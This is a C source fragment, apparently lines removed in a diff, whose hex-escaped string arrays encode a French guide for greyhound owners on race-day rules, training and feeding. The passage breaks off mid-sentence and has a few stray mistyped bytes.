-"\x73\x75\x72\x20\x75\x6e\x20\x63\x79\x6e\x6f\x64\x72\x6f\x6d\x65" -"\x2c\x20\x63\x61\x72\x20\x63\x65\x6c\x61\x20\x76\x61\x20\xe9\x6e" -"\x65\x72\x76\x65\x72\x20\x6c\x65\x73\x20\x63\x6f\x6e\x63\x75\x72" 
-"\x72\x65\x6e\x74\x73\x20\x65\x74\x20\x70\x65\x75\x74\x20\x63\x6f" -"\x6e\x64\x75\x69\x72\x65\x20\xe0\x20\x64\x65\x73\x20\x64\x69\x73" -"\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x73\x2e\x0d" -"\x4c\x65\x20\x76\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x63" -; -char file_part1[]= -"\x6f\x6e\x74\x72\xf4\x6c\x65\x20\x6c\x27\xe9\x74\x61\x74\x20\x64" -"\x65\x20\x73\x61\x6e\x74\xe9\x20\x65\x74\x20\x6e\x6f\x74\x61\x6d" -"\x6d\x65\x6e\x74\x20\x63\x65\x6c\x75\x69\x20\x64\x65\x73\x20\x64" -"\x6f\x69\x67\x74\x73\x20\x64\x65\x73\x20\x4c\xe9\x76\x72\x69\x65" -"\x72\x73\x20\x70\x6f\x75\x72\x20\x64\xe9\x74\x65\x63\x74\x65\x72" -"\x20\x64\x65\x73\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x2e\x20" -"\x44\x61\x6e\x73\x20\x6c\x65\x75\x72\x20\x69\x6e\x74\xe9\x72\xea" -"\x74\x2c\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x69\x6e\x74\x65\x72" -"\x64\x69\x72\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d" -"\x4f\x6e\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\x6c\x65" -"\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x20\x64\x65\x20\x6c\x61" -"\x20\x6a\x6f\x75\x72\x6e\xe9\x65\x2c\x20\x6d\x61\x69\x73\x20\x69" -"\x6c\x20\x79\x20\x61\xc0\x72\x61\x20\x73\x6f\x75\x76\x65\x6e\x74" -"\x20\x64\x65\x73\x20\x6d\x6f\x64\x69\x66\x69\x63\x61\x74\x69\x6f" -"\x6e\x73\x2e\x20\x45\x63\x6f\x75\x74\x65\x7a\x20\x62\x69\x65\x6e" -"\x20\x6c\x65\x73\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e" -"\x73\x20\x64\x69\x66\x66\x75\x73\xe9\x65\x73\x20\x70\x61\x72\x20" -"\x6c\x61\x20\x73\x6f\x6e\x6f\x20\x65\x74\x20\x73\x75\x69\x76\x65" -"\x7a\x20\x63\x65\x20\x71\x75\x27\x69\x6c\x20\x79\x20\x61\x20\x61" -"\x75\x20\x74\x61\x62\x6c\x65\x61\x75\x20\x64\x27\x61\x66\x66\x69" -"\x63\x68\x61\x67\x65\x2e\x0d\x0d\x41\x76\x61\x6e\x74\x20\x63\x68" -"\x61\x71\x75\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\xf9\x20\x76" -"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74" -"\x20\x69\x6e\x73\x63\x72\x69\x74\x2c\x20\x76\x6f\x75\x73\x20\x6c" -"\x27\x61\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x63\x6f\x6e\x74\x72" 
-"\xf4\x6c\x65\x20\x64\x65\x20\x64\xe9\x70\x61\x72\x74\x20\x6d\x75" -"\x6e\x69\x20\x64\x65\x20\x73\x61\x20\x63\x61\x73\x61\x71\x75\x65" -"\x20\x28\x6c\x65\x20\x6e\x75\x6d\xe9\x72\x6f\x20\x65\x73\x74\x20" -"\x61\x75\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x29\x20\x65\x74" -"\x20\x64\x65\x20\x73\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65" -"\x2e\x20\x4c\xe0\x2c\x20\x76\x6f\x75\x73\x20\x74\x69\x72\x65\x7a" -"\x20\x61\x75\x20\x73\x6f\x72\x74\x20\x6c\x61\x20\x63\x61\x73\x65" -"\x20\x64\x61\x6e\x73\x20\x6c\x61\x71\x75\x65\x6c\x6c\x65\x20\x76" -"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x65\x72" -"\x61\x20\x70\x6c\x61\x63\xe9\x20\x61\x75\x20\x64\xe9\x70\x61\x72" -"\x74\x2e\x0d\x0d\x41\x20\x6c\x27\x61\x70\x70\x65\x6c\x20\x64\x75" -"\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x6c\xe9\x76\x72\x69\x65" -"\x72\x73\x20\x61\x75\x20\x64\xe9\x70\x61\x72\x74\x20\x64\x65\x20" -"\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x6e\xb0\x78\x29\x20\x76" -"\x6f\x75\x73\x20\x61\x6c\x6c\x65\x7a\x20\x64\x61\x6e\x73\x20\x6c" -"\x27\x6f\x72\x64\x72\x65\x20\x64\x65\x73\x20\x63\x61\x73\x65\x73" -"\x2c\x20\x63\x68\x61\x63\x75\x6e\x20\x73\x65\x20\x6d\x65\x74\x20" -"\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20\x73\x69\x65\x6e" -"\x6e\x65\x2c\x20\x65\x74\x20\xe0\x20\x6c\x27\x6f\x72\x64\x72\x65" -"\x20\x64\x75\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x65\x6e\x20" -"\x62\x6f\x69\x74\x65\x29\x20\x76\x6f\x75\x73\x20\x6c\x27\x69\x6e" -"\x74\x72\x6f\x64\x75\x69\x72\x65\x7a\x20\x65\x6e\x20\x66\x65\x72" -"\x6d\x61\x6e\x74\x20\x62\x69\x65\x6e\x20\x6c\x61\x20\x70\x6f\x72" -"\x74\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x75\x69\x20" -"\x73\x61\x6e\x73\x20\x72\x61\x6c\x65\x6e\x74\x69\x72\x20\x6c\x61" -"\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x62\x6f\x69\x74\x65\x2e\x0d" -"\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74\x20\x70\x61" -"\x72\x74\x69\x65\x2c\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65" -"\x76\x65\x7a\x20\x70\x61\x73\x20\x63\x72\x69\x65\x72\x20\x61\x70" 
-"\x72\xe8\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61" -"\x75\x20\x72\x69\x73\x71\x75\x65\x20\x64\x65\x20\x6c\x65\x20\x66" -"\x61\x69\x72\x65\x20\x72\x65\x76\x65\x6e\x69\x72\x20\x76\x65\x72" -"\x73\x20\x76\x6f\x75\x73\x2e\x20\x56\x6f\x75\x73\x20\x6e\x65\x20" -"\x64\x65\x76\x65\x7a\x20\x70\x61\x73\x20\x6c\x27\x65\x78\x63\x69" -"\x74\x65\x72\x20\x70\x61\x72\x20\x75\x6e\x20\x6d\x6f\x79\x65\x6e" -"\x20\x71\x75\x65\x6c\x63\x6f\x6e\x71\x75\x65\x2e\x20\x20\x56\x6f" -"\x75\x73\x20\x76\x6f\x75\x73\x20\x72\x61\x70\x70\x72\x6f\x63\x68" -"\x65\x7a\x20\x64\x65\x20\x6c\x61\x20\x7a\x6f\x6e\x65\x20\x64\x27" -"\x61\x72\x72\x69\x76\xe9\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72" -"\x65\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x72\xe9\x63\x75\x70\xe9" -"\x72\x65\x72\x20\x64\xe8\x73\x20\x6c\x27\x61\x72\x72\x69\x76\xe9" -"\x65\x2e\x0d\x0d\x41\x70\x72\xe8\x73\x20\x6c\x27\x61\x76\x6f\x69" -"\x72\x20\x72\xe9\x63\x75\x70\xe9\x72\xe9\x2c\x20\x76\x6f\x75\x73" -"\x20\xf4\x74\x65\x7a\x20\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8" -"\x72\x65\x20\x65\x74\x20\x76\x6f\x75\x73\x20\x6c\x65\x20\x72\x61" -"\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x72\x65\x70\x6f\x73\x2c\x20" -"\x20\x64\x65\x20\x70\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65\x20\x65" -"\x6e\x20\x6c\x65\x20\x66\x61\x69\x73\x61\x6e\x74\x20\x75\x6e\x20" -"\x70\x65\x75\x20\x6d\x61\x72\x63\x68\x65\x72\x20\x70\x6f\x75\x72" -"\x20\x6c\x65\x20\x64\xe9\x74\x65\x6e\x64\x72\x65\x2e\x0d\x4c\x65" -"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x73\x65\x72\x61\x20\x61" -"\x66\x66\x69\x63\x68\xe9\x2e\x0d\x0d\x45\x6e\x20\x50\x2e\x56\x2e" -"\x4c\x2e\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65\x76\x65\x7a" -"\x20\x70\x61\x73\x20\x6c\x61\x69\x73\x73\x65\x72\x20\x6c\x65\x20" -"\x4c\xe9\x76\x72\x69\x65\x72\x20\x76\x6f\x69\x72\x20\x6c\x65\x20" -"\x70\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x63\x61\x72\x20\x69\x6c" -"\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x6f\x75\x70\x65\x72" -"\x20\x65\x74\x20\xea\x74\x72\x65\x20\x70\xe9\x6e\x61\x6c\x69\x73" 
-"\xe9\x2e\x0d\x0d\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x65\x75\x20" -"\x64\x65\x73\x20\x69\x6e\x63\x69\x64\x65\x6e\x74\x73\x2c\x20\x67" -"\x61\x72\x64\x65\x7a\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c\x6d" -"\x65\x2e\x20\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74" -"\x20\x75\x6e\x20\x73\x70\x6f\x72\x74\x20\x70\x6c\x65\x69\x6e\x20" -"\x64\x27\x61\x6c\xe9\x61\x73\x20\x65\x74\x20\x6c\x65\x73\x20\x4c" -"\xe9\x76\x72\x69\x65\x72\x73\x20\x6f\x6e\x74\x20\x70\x61\x72\x66" -"\x6f\x69\x73\x20\x75\x6e\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d" -"\x65\x6e\x74\x20\x74\x72\xe8\x73\x20\x64\xe9\x63\x65\x76\x61\x6e" -"\x74\x2e\x20\x4e\x27\x61\x67\x72\x65\x73\x73\x65\x7a\x20\x70\x61" -"\x73\x20\x6c\x65\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72" -"\x65\x20\x64\x27\x75\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x71" -"\x75\x69\x20\x61\x20\x67\xea\x6e\xe9\x20\x6c\x65\x20\x76\xf4\x74" -"\x72\x65\x2e\x20\x49\x6c\x20\x6e\xf9\x79\x20\x65\x73\x74\x20\x70" -"\x6f\x75\x72\x20\x72\x69\x65\x6e\x20\x65\x74\x20\x65\x73\x74\x20" -"\x64\xe9\x6a\xe0\x20\x61\x73\x73\x65\x7a\x20\x6d\x61\x6c\x68\x65" -"\x75\x72\x65\x75\x78\x20\x64\x27\xea\x74\x72\x65\x20\x64\x69\x73" -"\x71\x75\x61\x6c\x69\x66\x69\xe9\x2e\x20\x4e\x65\x20\x76\x6f\x75" -"\x73\x20\x65\x6e\x20\x70\x72\x65\x6e\x65\x7a\x20\x70\x61\x73\x20" -"\x61\x75\x78\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73" -"\x20\x6e\x69\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x73\x69\x20\x76" -"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74" -"\x20\x73\x61\x6e\x63\x74\x69\x6f\x6e\x6e\xe9\x20\x73\x61\x6e\x73" -"\x20\x71\x75\x65\x20\x76\x6f\x75\x73\x20\x61\x79\x69\x65\x7a\x20" -"\x76\x75\x20\x71\x75\x65\x6c\x71\x75\x65\x20\x63\x68\x6f\x73\x65" -"\x2c\x20\x6f\x75\x20\x70\x61\x72\x63\x65\x20\x71\x75\x65\x20\x76" -"\x6f\x75\x73\x20\x69\x6e\x63\x72\x69\x6d\x69\x6e\x65\x7a\x20\x75" -"\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x0d\x56\x6f" -"\x75\x73\x20\x61\x76\x65\x7a\x20\x61\x66\x66\x61\x69\x72\x65\x20" 
-"\xe0\x20\x64\x65\x73\x20\x62\xe9\x6e\xe9\x76\x6f\x6c\x65\x73\x20" -"\x65\x78\x70\xe9\x72\x69\x6d\x65\x6e\x74\xe9\x73\x2c\x20\x64\x6f" -"\x6e\x74\x20\x6c\x65\x73\x20\x64\xe9\x63\x69\x73\x69\x6f\x6e\x73" -"\x20\x73\x6f\x6e\x74\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x2c" -"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\xe9\x65\x73\x20\x70\x61\x72\x20" -"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9" -"\x76\x72\x69\x65\x72\x73\x2e\x20\x43\x65\x20\x71\x75\x27\x69\x6c" -"\x73\x20\x20\x6f\x6e\x74\x20\x76\x75\x20\xe0\x20\x31\x35\x30\x20" -"\x6d\xe8\x74\x72\x65\x73\x20\x64\x65\x20\x76\x6f\x75\x73\x2c\x20" -"\xe0\x20\x35\x30\x20\x4b\x6d\x2f\x68\x2c\x20\x70\x65\x75\x74\x20" -"\x6e\x27\x61\x76\x6f\x69\x72\x20\x64\x75\x72\xe9\x20\x71\x75\x65" -"\x20\x31\x20\x6f\x75\x20\x32\x20\x64\x69\x78\x69\xe8\x6d\x65\x73" -"\x20\x64\x65\x20\x73\x65\x63\x6f\x6e\x64\x65\x20\x28\x32\x6d\x29" -"\x2e\x20\x52\x61\x70\x70\x65\x6c\x65\x7a\x2d\x76\x6f\x75\x73\x20" -"\x71\x75\x65\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65" -"\x72\x20\x73\x65\x6e\x74\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c" -"\x6d\x65\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\xe9\x6e\x65\x72" -"\x76\x65\x6d\x65\x6e\x74\x2c\x20\x71\x75\x65\x20\x73\x65\x73\x20" -"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x74\x20\x73\x6f\x6e" -"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x73\x27" -"\x65\x6e\x20\x72\x65\x73\x73\x65\x6e\x74\x65\x6e\x74\x2e\x0d\x4c" -"\x61\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x65\x20\x66\x61\xe7\x6f" -"\x6e\x20\x64\x65\x20\x70\x65\x72\x64\x72\x65\x20\x65\x73\x74\x20" -"\x64\x27\x61\x62\x6f\x72\x64\x20\x64\x65\x20\x73\x65\x20\x63\x6f" -"\x6d\x70\x6f\x72\x74\x65\x72\x20\x65\x6e\x20\x6d\x61\x75\x76\x61" -"\x69\x73\x20\x70\x65\x72\x64\x61\x6e\x74\x2e\x0d\x53\x69\x20\x76" -"\x6f\x75\x73\x20\x6e\x65\x20\x70\x61\x72\x76\x65\x6e\x65\x7a\x20" -"\x70\x61\x73\x20\xe0\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x74\x72" -"\xf4\x6c\x65\x72\x2c\x20\x61\x62\x61\x6e\x64\x6f\x6e\x6e\x65\x7a" 
-"\x20\x6c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72\x69\x65" -"\x72\x2e\x0d\x53\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20" -"\x75\x6e\x65\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x69\x6f\x6e\x20" -"\xe0\x20\x66\x61\x69\x72\x65\x2c\x20\x61\x64\x72\x65\x73\x73\x65" -"\x7a\x2d\x76\x6f\x75\x73\x20\x61\x75\x20\x63\x68\x65\x66\x20\x64" -"\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x73\x65\x75\x6c\x65\x20\x70" -"\x65\x72\x73\x6f\x6e\x6e\x65\x20\x61\x75\x74\x6f\x72\x69\x73\xe9" -"\x65\x20\xe0\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x74\x72\x65\x20" -"\x6c\x65\x73\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73" -"\x2e\x0d\x0d\x41\x20\x6c\x27\x69\x73\x73\x75\x65\x20\x64\x65\x20" -"\x6c\x61\x20\x72\xe9\x75\x6e\x69\x6f\x6e\x20\x6f\x6e\x20\x76\x6f" -"\x75\x73\x20\x72\x65\x6d\x65\x74\x74\x72\x61\x20\x76\x6f\x74\x72" -"\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\xfb\x6d\x65\x6e\x74\x20" -"\x72\x65\x6d\x70\x6c\x69\x2c\x20\x76\x6f\x73\x20\x70\x72\x69\x78" -"\x2e\x20\x43\x6f\x6e\x74\x72\xf4\x6c\x65\x7a\x20\x62\x69\x65\x6e" -"\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x63\x61\x72\x20\x69" -"\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69\x72\x20\x65" -"\x75\x20\x64\x65\x73\x20\x65\x72\x72\x65\x75\x72\x73\x20\x64\x65" -"\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x71" -"\x75\x27\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x66\x66\x69\x63" -"\x69\x6c\x65\x20\x64\x65\x20\x63\x6f\x72\x72\x69\x67\x65\x72\x20" -"\x65\x6e\x73\x75\x69\x74\x65\x2e\x0d\x53\x6f\x79\x65\x7a\x20\x70" -"\x61\x74\x69\x65\x6e\x74\x20\x3a\x20\x4c\x65\x20\x73\x65\x63\x72" -"\xe9\x74\x61\x72\x69\x61\x74\x20\x61\x75\x72\x61\x20\x63\x6f\x6e" -"\x73\x61\x63\x72\xe9\x20\x6c\x61\x20\x70\x61\x75\x73\x65\x20\x64" -"\x75\x20\x64\xe9\x6a\x65\x75\x6e\x65\x72\x20\xe0\x20\x70\x72\xe9" -"\x2d\x72\x65\x6d\x70\x6c\x69\x72\x20\x6c\x65\x73\x20\x63\x61\x72" -"\x6e\x65\x74\x73\x2c\x20\x6d\x61\x69\x73\x20\x6c\x61\x69\x73\x73" -"\x65\x7a\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x6c\x65\x20\x74\x65" 
-"\x6d\x70\x73\x20\x64\x27\x69\x6e\x73\x63\x72\x69\x72\x65\x20\x6c" -"\x65\x20\x63\x6c\x61\x73\x73\x65\x6d\x65\x6e\x74\x20\x65\x74\x20" -"\x64\x65\x20\x73\x69\x67\x6e\x65\x72\x2e\x20\x56\x6f\x75\x73\x20" -"\x61\x76\x65\x7a\x20\x70\x65\x75\x74\x2d\xea\x74\x72\x65\x20\x75" -"\x6e\x65\x20\x6c\x6f\x6e\x67\x75\x65\x20\x64\x69\x73\x74\x61\x6e" -"\x63\x65\x20\xe0\x20\x70\x61\x72\x63\x6f\x75\x72\x69\x72\x20\x70" -"\x6f\x75\x72\x20\x72\x65\x6e\x74\x72\x65\x72\x20\x63\x68\x65\x7a" -"\x20\x76\x6f\x75\x73\x2c\x20\x6d\x61\x69\x73\x20\x6f\x6e\x20\x6e" -"\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x76\x6f\x75\x73\x20" -"\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74" -"\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x76\x6f\x74\x72\x65\x20\x63" -"\x68\x69\x65\x6e\x20\x61\x20\xe9\x74\xe9\x20\x70\x72\xe9\x6d\x61" -"\x74\x75\x72\xe9\x6d\x65\x6e\x74\x20\xe9\x6c\x69\x6d\x69\x6e\xe9" -"\x2e\x20\x56\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20\x74\x6f" -"\x75\x6a\x6f\x75\x72\x73\x20\x64\x65\x6d\x61\x6e\x64\x65\x72\x20" -"\xe0\x20\x75\x6e\x20\x61\x6d\x69\x20\x64\x65\x20\x72\xe9\x63\x75" -"\x70\xe9\x72\x65\x72\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20" -"\xe0\x20\x76\x6f\x74\x72\x65\x20\x70\x6c\x61\x63\x65\x20\x73\x69" -"\x20\x76\x6f\x75\x73\x20\x74\x65\x6e\x65\x7a\x20\xe0\x20\x70\x61" -"\x72\x74\x69\x72\x20\x74\xf4\x74\x2e\x0d\x0d\x45\x6e\x74\x72\x65" -"\x74\x69\x65\x6e\x20\x3a\x0d\x4c\x65\x73\x20\x70\x72\x6f\x62\x6c" -"\xe8\x6d\x65\x73\x20\x64\x65\x20\x6c\x27\x65\x6e\x74\x72\x61\xee" -"\x6e\x65\x6d\x65\x6e\x74\x2c\x20\x64\x65\x20\x6c\x27\x61\x6c\x69" -"\x6d\x65\x6e\x74\x61\x74\x69\x6f\x6e\x2c\x20\x64\x65\x73\x20\x73" -"\x6f\x69\x6e\x73\x20\x73\x6f\x75\x6c\xe8\x76\x65\x6e\x74\x20\x62" -"\x65\x61\x75\x63\x6f\x75\x70\x20\x64\x65\x20\x63\x6f\x6e\x74\x72" -"\x6f\x76\x65\x72\x73\x65\x73\x2c\x20\x63\x68\x61\x63\x75\x6e\x20" -"\x61\x79\x61\x6e\x74\x20\x73\x61\x20\x72\x65\x63\x65\x74\x74\x65" -"\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x73\x61\x20\x74\x68\xe9" 
-"\x6f\x72\x69\x65\x2e\x0d\x0d\x45\x6e\x74\x72\x61\xee\x6e\x65\x6d" -"\x65\x6e\x74\x20\x3a\x0d\x54\x6f\x75\x74\x20\x65\x6e\x74\x72\x61" -"\xee\x6e\x65\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64" -"\x20\x75\x6e\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x68\x69\x76\x65" -"\x72\x6e\x61\x6c\x20\x64\x65\x20\x66\x6f\x6e\x64\x2c\x20\x64\x65" -"\x73\x20\x70\x68\x61\x73\x65\x73\x20\x64\x65\x20\x74\x72\x61\x76" -"\x61\x69\x6c\x20\x6d\x6f\x64\xe9\x72\xe9\x20\x28\x6d\x61\x72\x63" -"\x68\x65\x2c\x20\x74\x72\x6f\x74\x29\x2c\x20\x64\x65\x73\x20\x70" -"\x68\x61\x73\x65\x73\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" -"\x20\x28\x6c\x65\x75\x72\x72\x65\x2c\x20\x62\x61\x6c\x6c\x65\x2c" -"\x20\x73\x70\x72\x69\x6e\x74\x2c\x20\x65\x74\x63\x2e\x2e\x2e\x29" -"\x2e\x20\x4c\x65\x20\x64\x6f\x73\x61\x67\x65\x20\x76\x61\x72\x69" -"\x65\x20\x73\x65\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x20" -"\x28\x6c\x65\x20\x67\x72\x65\x79\x68\x6f\x75\x6e\x64\x2c\x20\x70" -"\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c\x20\x65\x73\x74\x20" -"\x6d\x6f\x69\x6e\x73\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x74\x20" -"\x71\x75\x65\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x29\x2c" -"\x20\x6c\x27\xe9\x70\x6f\x71\x75\x65\x2c\x20\x6c\x27\x69\x6e\x64" -"\x69\x76\x69\x64\x75\x2e\x0d\x43\x65\x72\x74\x61\x69\x6e\x73\x20" -"\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20\x64\x65\x20\x62\x65" -"\x61\x75\x63\x6f\x75\x70\x20\x64\x27\x65\x6e\x74\x72\x61\xee\x6e" -"\x65\x6d\x65\x6e\x74\x2c\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20" -"\x70\x65\x75\x2c\x20\x6d\x61\x69\x73\x20\x69\x6c\x20\x6e\x27\x79" -"\x20\x61\x20\x67\x75\xe8\x72\x65\x20\x64\x65\x20\x62\x6f\x6e\x73" -"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x73\x61\x6e\x73\x20" -"\x65\x66\x66\x6f\x72\x74\x73\x20\x64\x75\x20\x70\x72\x6f\x70\x72" -"\x69\xe9\x74\x61\x69\x72\x65\x2e\x0d\x49\x6c\x20\x66\x61\x75\x74" -"\x20\x64\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x61\x75\x20\x6d\x6f" -"\x69\x6e\x73\x20\x74\x72\x6f\x69\x73\x20\x73\x65\x6d\x61\x69\x6e" 
-"\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x70\x6c\x75\x73" -"\x69\x65\x75\x72\x73\x20\x6d\x6f\x69\x73\x20\x70\x6f\x75\x72\x20" -"\x6d\x65\x74\x74\x72\x65\x20\x75\x6e\x20\x6c\xe9\x76\x72\x69\x65" -"\x91\x20\x65\x6e\x20\x66\x6f\x72\x6d\x65\x2e\x20\x4c\x65\x73\x20" -"\x72\x69\x73\x71\x75\x65\x50\x20\x64\x65\x20\x62\x6c\x65\x73\x73" -"\x75\x72\x65\x73\x20\x73\x6f\x6e\x74\x20\xe9\x6c\x65\x76\xe9\x73" -"\x20\x65\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x6d\xe9\x66\x6f\x72" -"\x6d\x65\x20\x6f\x75\x20\x64\x65\x20\x73\x75\x70\x65\x72\x20\x63" -"\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x2e\x0d\x42\x65\x61\x75\x63\x6f" -"\x75\x70\x20\x28\x6d\x61\x69\x73\x20\x70\x61\x73\x20\x74\x6f\x75" -"\x74\x65\x73\x29\x20\x20\x64\x65\x20\x66\x65\x6d\x65\x6c\x6c\x65" -"\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x6e\x74\x20\x6c\x65\x75" -"\x72\x20\x76\x69\x74\x65\x73\x73\x65\x20\x61\x76\x61\x6e\x74\x20" -"\x6c\x65\x73\xd8\x63\x68\x61\x6c\x65\x75\x72\x73\x2c\x20\x65\x74" -"\x20\x62\x61\x69\x73\x73\x65\x6e\x74\x20\x64\x65\x20\x66\x6f\x72" -"\x6d\x65\x20\x70\x65\x6e\x64\x61\x6e\x74\x20\x71\x75\x61\x74\x72" -"\x65\x20\xe0\x20\x68\x75\x69\x74\x20\x73\x65\x6d\x61\x69\x6e\x65" -"\x73\x20\x61\x70\x72\xe8\x73\x20\x6c\x65\x20\x6d\x69\x6c\x69\x65" -"\x75\x20\x64\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72\x73\x2e\x20" -"\x4c\x61\x20\x76\x69\x74\x65\x73\x73\x65\x20\x6d\x61\x78\x69\x6d" -"\x75\x6d\x20\x65\x73\x74\x20\x61\x4a\x74\x65\x69\x6e\x74\x65\x20" -"\x76\x65\x72\x73\x20\x31\x32\x20\x2d\x20\x31\x35\x20\x6d\x6f\x69" -"\x73\x2c\x20\x6d\x61\x69\x73\x20\x61\x76\x65\x63\x20\x6c\x65\x20" -"\x6d\xe9\x74\x69\x65\x72\x2c\x20\x6c\x65\x73\x20\x6d\x65\x69\x6c" -"\x6c\x65\x75\x72\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20" -"\x73\x6f\x6e\x74\x20\x64\x65\x20\x32\x20\xe0\x20\x35\x20\x61\x6e" -"\x73\x2e\x20\x0d\x50\x61\x73\x73\xe9\x20\x73\x69\x78\x20\x61\x6e" -"\x73\x2c\x20\x6c\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x62\x61" -"\x69\x73\x73\x65\x2e\x0d\x0d\x0d\x0d\x0d\x41\x6c\x69\x6d\x65\x6e" 
-"\x74\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x0d\x45\x6c\x6c\x65\x20\x70" -"\x65\x75\x74\x20\xea\x74\x72\x65\x20\x74\x72\x61\x64\x69\x74\x69" -"\x6f\x6e\x6e\x65\x6c\x6c\x65\x2c\x20\x73\x61\x6e\x73\x20\x74\x72" -"\x6f\x70\x20\x64\x65\x20\x6c\xe9\x67\x75\x6d\x65\x73\x20\x6f\x75" -"\x20\x64\x65\x20\x66\xe9\x63\x75\x6c\x65\x6e\x74\x73\x2c\x20\x6f" -"\x75\x20\xe0\x20\x62\x61\x73\x65\x20\x64\x27\x61\x6c\x69\x6d\x65" -"\x6e\x74\x73\x20\x64\x75\x20\x63\x6f\x6d\x6d\x65\x72\x63\x65\x2e" -"\x20\x49\x6c\x20\x76\x61\x75\x74\x20\x6d\x69\x65\x75\x78\x20\x64" -"\x65\x75\x78\x20\x6f\x75\x20\x74\x72\x6f\x69\x73\x20\x72\x65\x70" 